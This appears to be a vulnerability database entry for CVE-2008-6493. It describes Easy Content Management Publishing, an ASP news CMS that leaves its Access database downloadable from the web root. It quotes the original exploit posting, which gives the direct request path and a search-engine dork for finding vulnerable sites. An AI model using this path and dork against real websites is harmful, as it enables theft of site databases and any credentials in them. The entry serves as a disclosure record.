Easy-News Easy Content Management Publishing 'Database/News.mdb' Permissions and Access Control Vulnerability

Vulnerability ID: 1116936
Vulnerability type: Permissions and access control
Published: 2008-12-04
Updated: 2009-03-19
CVE ID: CVE-2008-6493
CNNVD-ID: CNNVD-200903-330
Platform: ASP
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/7340
https://www.securityfocus.com/bid/84558
https://cxsecurity.com/issue/WLB-2009030204
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-330
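|Vulnerability details
Easy Content Management Publishing is an easy-to-use, ASP-based content management system. It stores sensitive information under the web root without sufficient access control, which allows remote attackers to download the database via a direct request for Database/News.mdb.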
|Exploit
#######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
#
# Script : Easy Content Management Publishing
# Script Site : http://easy-news.org/content-management-terns.asp
# Description :
#  An easy to use ASP-based content management news system. Multiple login levels, news expiration dates and many more
# features. Uses MS Access database. Content management systems help increase freshness of your site's content by making it
# easy to update. Free license under the GPL.
# 
# Exploit:
# SITE.COM/Database/News.mdb
# D0rk : "powered by easy-news.org"
#
#######################################################

# milw0rm.com [2008-12-04]
|Affected products
Easy-News Easy Content Management Publishing -
|References

Source: XF
Name: easycontent-news-information-disclosure(49392)
Link: http://xforce.iss.net/xforce/xfdb/49392
Source: MILW0RM
Name: 7340
Link: http://www.milw0rm.com/exploits/7340